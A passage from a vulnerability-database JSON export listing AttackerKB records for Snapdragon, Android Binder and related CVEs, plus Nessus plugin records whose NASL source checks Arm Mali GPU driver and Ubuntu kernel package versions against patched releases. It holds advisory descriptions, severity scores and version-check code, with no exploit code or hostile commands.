"CVE-2020-11261", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11261"], "modified": "2021-06-17T00:00:00", "id": "AKB:AAE507C1-8527-4F4A-9456-38A03B4A132E", "href": "https://attackerkb.com/topics/MYehmFmVBc/cve-2020-11261", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-10T02:21:51", "description": "Improper handling of address deregistration on failure can lead to new GPU address allocation failure. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-07T00:00:00", "type": "attackerkb", "title": "CVE-2021-1906", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1906"], "modified": "2021-05-13T00:00:00", "id": "AKB:AAD3528A-95B0-4506-889F-B89CADC8ADE4", "href": "https://attackerkb.com/topics/a31RmzOrGy/cve-2021-1906", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-07-23T02:30:30", "description": "Possible use after free due to improper handling of memory mapping of multiple processes simultaneously. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-07T00:00:00", "type": "attackerkb", "title": "CVE-2021-1905", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1905"], "modified": "2021-05-13T00:00:00", "id": "AKB:B0D45425-6D7E-4251-BCA3-D03D8F4E38F9", "href": "https://attackerkb.com/topics/wbsz1xIyiy/cve-2021-1905", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:12:36", "description": "A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID: A-141720095\n\n \n**Recent assessments:** \n \n**timwr** at December 11, 2019 7:11am UTC reported:\n\nThere is a working proof of concept available for some devices.\n\n**busterb** at February 23, 2020 9:20am UTC reported:\n\nThere is a working proof of concept available for some devices.\n\n**gwillcox-r7** at November 22, 2020 2:48am UTC reported:\n\nThere is a working proof of concept available for some devices.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-11T00:00:00", "type": "attackerkb", "title": "CVE-2019-2215", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2020-07-30T00:00:00", "id": "AKB:513E78C5-A9BA-4905-8241-8357FAC786ED", "href": "https://attackerkb.com/topics/QXxPFH4Sxs/cve-2019-2215", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-07-13T01:22:05", "description": "The version of the Mali GPU Kernel Driver installed on the remote system is prior to r29p0 running on Bifrost or Valhall architecture or prior to r31p0 running on Midgard architecture. It is, therefore affected by a use-after-free error.\nvulnerability. A non-privileged user can make improper operations on GPU memory to enter into a use-after-free scenario and may be able to gain root privilege, and/or disclose information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-07-11T00:00:00", "type": "nessus", "title": "ARM Mali GPU Kernel Driver < r29p0 / < r31p0 Use After Free (CVE-2021-28663)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-28663"], "modified": "2023-07-12T00:00:00", "cpe": ["cpe:/a:arm:bifrost_gpu_driver", "cpe:/a:arm:valhall_gpu_driver", "cpe:/a:arm:midgard"], "id": "ARM_MALI_GPU_CVE-2021-28663.NASL", "href": "https://www.tenable.com/plugins/nessus/178129", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(178129);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/12\");\n\n script_cve_id(\"CVE-2021-28663\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"ARM Mali GPU Kernel Driver < r29p0 / < r31p0 Use After Free (CVE-2021-28663)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a driver that is affected by a use after free error.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Mali GPU Kernel Driver installed on the remote system is prior to r29p0 running on Bifrost or Valhall\narchitecture or prior to r31p0 running on Midgard architecture. It is, therefore affected by a use-after-free error.\nvulnerability. A non-privileged user can make improper operations on GPU memory to enter into a use-after-free scenario\nand may be able to gain root privilege, and/or disclose information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7073d53\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mali GPU Kernel Driver r29p0, r31p0 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28663\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:arm:bifrost_gpu_driver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:arm:valhall_gpu_driver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:arm:midgard\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"arm_mali_driver_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Arm Mali GPU Driver\");\n\n exit(0);\n}\n\ninclude('vcf_extras_arm.inc');\n\nvar app_info = vcf::arm::mali_gpu::get_app_info(app:'Arm Mali GPU Driver');\n\nvar constraints = [\n {'min_version': 'r4p0', 'max_version': 'r30p0', 'fixed_version': 'r31p0', 'family': 'Midgard'},\n {'min_version': 'r0p0', 'max_version': 'r28p0', 'fixed_version': 'r29p0', 'family': 'Bifrost'},\n {'min_version': 'r19p0', 'max_version': 'r28p0', 'fixed_version': 'r29p0', 'family': 'Valhall'}\n];\n\nvcf::arm::mali_gpu::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-13T01:22:06", "description": "The version of the Mali GPU Kernel Driver installed on the remote system is prior to r30p0 running on Bifrost or Valhall architecture or prior to r31p0 running on Midgard architecture. It is, therefore affected by an improper memory access vulnerability. A non-privileged user can get a write access to read-only memory, and may be able to gain root privilege, corrupt memory and modify the memory of other processes.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-07-11T00:00:00", "type": "nessus", "title": "ARM Mali GPU Kernel Driver < r30p0 / < r31p0 Improper Memory Access (CVE-2021-28664)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-28664"], "modified": "2023-07-12T00:00:00", "cpe": ["cpe:/a:arm:bifrost_gpu_driver", "cpe:/a:arm:valhall_gpu_driver", "cpe:/a:arm:midgard"], "id": "ARM_MALI_GPU_CVE-2021-28664.NASL", "href": "https://www.tenable.com/plugins/nessus/178139", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(178139);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/12\");\n\n script_cve_id(\"CVE-2021-28664\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"ARM Mali GPU Kernel Driver < r30p0 / < r31p0 Improper Memory Access (CVE-2021-28664)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a driver that is affected by an improper memory access vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Mali GPU Kernel Driver installed on the remote system is prior to r30p0 running on Bifrost or Valhall\narchitecture or prior to r31p0 running on Midgard architecture. It is, therefore affected by an improper memory access\nvulnerability. A non-privileged user can get a write access to read-only memory, and may be able to gain root privilege,\ncorrupt memory and modify the memory of other processes.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7073d53\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mali GPU Kernel Driver r30p0, r31p0 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28664\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:arm:bifrost_gpu_driver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:arm:valhall_gpu_driver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:arm:midgard\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"arm_mali_driver_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Arm Mali GPU Driver\");\n\n exit(0);\n}\n\ninclude('vcf_extras_arm.inc');\n\nvar app_info = vcf::arm::mali_gpu::get_app_info(app:'Arm Mali GPU Driver');\n\nvar constraints = [\n {'min_version': 'r8p0', 'max_version': 'r30p0', 'fixed_version': 'r31p0', 'family': 'Midgard'},\n {'min_version': 'r0p0', 'max_version': 'r29p0', 'fixed_version': 'r30p0', 'family': 'Bifrost'},\n {'min_version': 'r19p0', 'max_version': 'r29p0', 'fixed_version': 'r30p0', 'family': 'Valhall'}\n];\n\nvcf::arm::mali_gpu::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:31:50", "description": "USN-4186-1 fixed vulnerabilities in the Linux kernel. It was discovered that the kernel fix for CVE-2019-0155 (i915 missing Blitter Command Streamer check) was incomplete on 64-bit Intel x86 systems.\nThis update addresses the issue.\n\nWe apologize for the inconvenience.\n\nStephan van Schaik, Alyssa Milburn, Sebastian Osterlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida, Giorgi Maisuradze, Moritz Lipp, Michael Schwarz, Daniel Gruss, and Jo Van Bulck discovered that Intel processors using Transactional Synchronization Extensions (TSX) could expose memory contents previously stored in microarchitectural buffers to a malicious process that is executing on the same CPU core. A local attacker could use this to expose sensitive information. (CVE-2019-11135)\n\nIt was discovered that the Intel i915 graphics chipsets allowed userspace to modify page table entries via writes to MMIO from the Blitter Command Streamer and expose kernel memory information. A local attacker could use this to expose sensitive information or possibly elevate privileges. (CVE-2019-0155)\n\nDeepak Gupta discovered that on certain Intel processors, the Linux kernel did not properly perform invalidation on page table updates by virtual guest operating systems. A local attacker in a guest VM could use this to cause a denial of service (host system crash).\n(CVE-2018-12207)\n\nIt was discovered that the Intel i915 graphics chipsets could cause a system hang when userspace performed a read from GT memory mapped input output (MMIO) when the product is in certain low power states. A local attacker could use this to cause a denial of service.\n(CVE-2019-0154)\n\nHui Peng discovered that the Atheros AR6004 USB Wi-Fi device driver for the Linux kernel did not properly validate endpoint descriptors returned by the device. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15098)\n\nIt was discovered that a buffer overflow existed in the 802.11 Wi-Fi configuration interface for the Linux kernel when handling beacon settings. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-16746)\n\nOri Nimron discovered that the AX25 network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17052)\n\nOri Nimron discovered that the IEEE 802.15.4 Low-Rate Wireless network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17053)\n\nOri Nimron discovered that the Appletalk network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17054)\n\nOri Nimron discovered that the modular ISDN network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17055)\n\nOri Nimron discovered that the Near field Communication (NFC) network protocol implementation in the Linux kernel did not properly perform permissions checks. A local attacker could use this to create a raw socket. (CVE-2019-17056)\n\nNico Waisman discovered that a buffer overflow existed in the Realtek Wi-Fi driver for the Linux kernel when handling Notice of Absence frames. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2019-17666)\n\nMaddie Stone discovered that the Binder IPC Driver implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-2215).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-11-14T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : Linux kernel vulnerability (USN-4186-3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12207", "CVE-2019-0154", "CVE-2019-0155", "CVE-2019-11135", "CVE-2019-15098", "CVE-2019-16746", "CVE-2019-17052", "CVE-2019-17053", "CVE-2019-17054", "CVE-2019-17055", "CVE-2019-17056", "CVE-2019-17666", "CVE-2019-2215"], "modified": "2023-05-11T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-4186-3.NASL", "href": "https://www.tenable.com/plugins/nessus/131014", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4186-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(131014);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/11\");\n\n script_cve_id(\"CVE-2018-12207\", \"CVE-2019-0154\", \"CVE-2019-0155\", \"CVE-2019-11135\", \"CVE-2019-15098\", \"CVE-2019-16746\", \"CVE-2019-17052\", \"CVE-2019-17053\", \"CVE-2019-17054\", \"CVE-2019-17055\", \"CVE-2019-17056\", \"CVE-2019-17666\", \"CVE-2019-2215\");\n script_xref(name:\"USN\", value:\"4186-3\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Ubuntu 16.04 LTS : Linux kernel vulnerability (USN-4186-3)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-4186-1 fixed vulnerabilities in the Linux kernel. It was\ndiscovered that the kernel fix for CVE-2019-0155 (i915 missing Blitter\nCommand Streamer check) was incomplete on 64-bit Intel x86 systems.\nThis update addresses the issue.\n\nWe apologize for the inconvenience.\n\nStephan van Schaik, Alyssa Milburn, Sebastian Osterlund, Pietro\nFrigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida, Giorgi\nMaisuradze, Moritz Lipp, Michael Schwarz, Daniel Gruss, and Jo Van\nBulck discovered that Intel processors using Transactional\nSynchronization Extensions (TSX) could expose memory contents\npreviously stored in microarchitectural buffers to a malicious process\nthat is executing on the same CPU core. A local attacker could use\nthis to expose sensitive information. (CVE-2019-11135)\n\nIt was discovered that the Intel i915 graphics chipsets allowed\nuserspace to modify page table entries via writes to MMIO from the\nBlitter Command Streamer and expose kernel memory information. A local\nattacker could use this to expose sensitive information or possibly\nelevate privileges. (CVE-2019-0155)\n\nDeepak Gupta discovered that on certain Intel processors, the Linux\nkernel did not properly perform invalidation on page table updates by\nvirtual guest operating systems. A local attacker in a guest VM could\nuse this to cause a denial of service (host system crash).\n(CVE-2018-12207)\n\nIt was discovered that the Intel i915 graphics chipsets could cause a\nsystem hang when userspace performed a read from GT memory mapped\ninput output (MMIO) when the product is in certain low power states. A\nlocal attacker could use this to cause a denial of service.\n(CVE-2019-0154)\n\nHui Peng discovered that the Atheros AR6004 USB Wi-Fi device driver\nfor the Linux kernel did not properly validate endpoint descriptors\nreturned by the device. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2019-15098)\n\nIt was discovered that a buffer overflow existed in the 802.11 Wi-Fi\nconfiguration interface for the Linux kernel when handling beacon\nsettings. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-16746)\n\nOri Nimron discovered that the AX25 network protocol implementation in\nthe Linux kernel did not properly perform permissions checks. A local\nattacker could use this to create a raw socket. (CVE-2019-17052)\n\nOri Nimron discovered that the IEEE 802.15.4 Low-Rate Wireless network\nprotocol implementation in the Linux kernel did not properly perform\npermissions checks. A local attacker could use this to create a raw\nsocket. (CVE-2019-17053)\n\nOri Nimron discovered that the Appletalk network protocol\nimplementation in the Linux kernel did not properly perform\npermissions checks. A local attacker could use this to create a raw\nsocket. (CVE-2019-17054)\n\nOri Nimron discovered that the modular ISDN network protocol\nimplementation in the Linux kernel did not properly perform\npermissions checks. A local attacker could use this to create a raw\nsocket. (CVE-2019-17055)\n\nOri Nimron discovered that the Near field Communication (NFC) network\nprotocol implementation in the Linux kernel did not properly perform\npermissions checks. A local attacker could use this to create a raw\nsocket. (CVE-2019-17056)\n\nNico Waisman discovered that a buffer overflow existed in the Realtek\nWi-Fi driver for the Linux kernel when handling Notice of Absence\nframes. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2019-17666)\n\nMaddie Stone discovered that the Binder IPC Driver implementation in\nthe Linux kernel contained a use-after-free vulnerability. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2019-2215).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4186-3/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-17666\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2019-2023 Canonical, Inc. / NASL script (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-12207\", \"CVE-2019-0154\", \"CVE-2019-0155\", \"CVE-2019-11135\", \"CVE-2019-15098\", \"CVE-2019-16746\", \"CVE-2019-17052\", \"CVE-2019-17053\", \"CVE-2019-17054\", \"CVE-2019-17055\", \"CVE-2019-17056\", \"CVE-2019-17666\", \"CVE-2019-2215\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-4186-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-169-generic\", pkgver:\"4.4.0-169.198\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-169-generic-lpae\", pkgver:\"4.4.0-169.198\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-169-lowlatency\", pkgver:\"4.4.0-169.198\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.169.177\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.4.0.169.177\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.169.177\")) 